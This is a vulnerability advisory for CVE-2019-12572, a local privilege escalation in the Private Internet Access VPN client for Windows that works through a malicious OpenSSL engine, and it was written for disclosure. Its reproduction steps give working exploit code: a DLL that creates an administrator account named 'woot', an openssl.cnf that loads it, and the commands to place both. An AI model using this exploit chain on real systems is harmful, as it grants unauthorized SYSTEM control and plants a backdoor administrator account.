Allele Security Alert
ASA-2019-00377
Identifier(s)
ASA-2019-00377, CVE-2019-12572
Title
Privilege Escalation due to malicious OpenSSL engine
Vendor(s)
London Trust Media, Inc
Product(s)
Private Internet Access (PIA) VPN Client for Windows
Affected version(s)
Private Internet Access (PIA) VPN Client for Windows version 1.0.2 (build 02363)
Fixed version(s)
Private Internet Access (PIA) VPN Client for Windows version v1.2.1
Proof of concept
Yes
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client 1.0.2 (build 02363) for Windows could allow an authenticated, local attacker to run arbitrary code with elevated privilege.
Technical details
On startup the PIA Windows service(pia-service.exe) loads the OpenSSL library from C:\Program Files\Private Internet Access\libeay32.dll. This library attempts to load the c:\etc\ssl\openssl.cnf configuration file which does not exist. By default on Windows systems, authenticated users can create directories under c:\. A low privileged user can create an openssl.cnf configuration file to load a malicious OpenSSL engine library resulting in the arbitrary code execution as SYSTEM when the service starts.
Steps to reproduce
Note: All steps are executed using a low privileged account.
1) Create the c:\etc\ssl directory
mkdir c:\etc\ssl
2) Create a malicious engine library named woot.dll to create an administrator
account named woot when loaded.
/* Cross Compile with x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared */ #include <windows.h> BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) { switch( fdwReason ) { case DLL_PROCESS_ATTACH: system("cmd /c net user woot insertpasswordhere /add"); system("cmd /c net localgroup administrators woot /add"); break; case DLL_THREAD_ATTACH: // Do thread-specific initialization. break; case DLL_THREAD_DETACH: // Do thread-specific cleanup. break; case DLL_PROCESS_DETACH: // Perform any necessary cleanup. break; } return TRUE; // Successful DLL_PROCESS_ATTACH. }
3) Copy the malicious woot.dll file into the c:\etc\ssl folder.
copy woot.dll c:\etc\ssl
4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.
openssl_conf = openssl_init [openssl_init] engines = engine_section [engine_section] woot = woot_section [woot_section] engine_id = woot dynamic_path = c:\\etc\\ssl\\woot.dll init = 0
5) Reboot the system because a low privilege user does not have permission to
restart the service.
6) After the reboot has completed, login and open a command shell. At this point
the “woot” administrator account will exist.
net user woot
Credits
Rich Mirch
Reference(s)
PIA Windows Privilege Escalation: Malicious OpenSSL engine
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12572.txt
CVE-2019-12572 PIA Windows Privilege Escalation: Malicious OpenSSL Engine
https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/
ASA-2019-00477 – OpenSSL: Windows builds with insecure path defaults
https://allelesecurity.com/asa-2019-00477/
Windows builds with insecure path defaults (CVE-2019-1552)
https://www.openssl.org/news/secadv/20190730.txt
CVE-2019-12572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12572
CVE-2019-12572
https://nvd.nist.gov/vuln/detail/CVE-2019-12572
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: July 30, 2019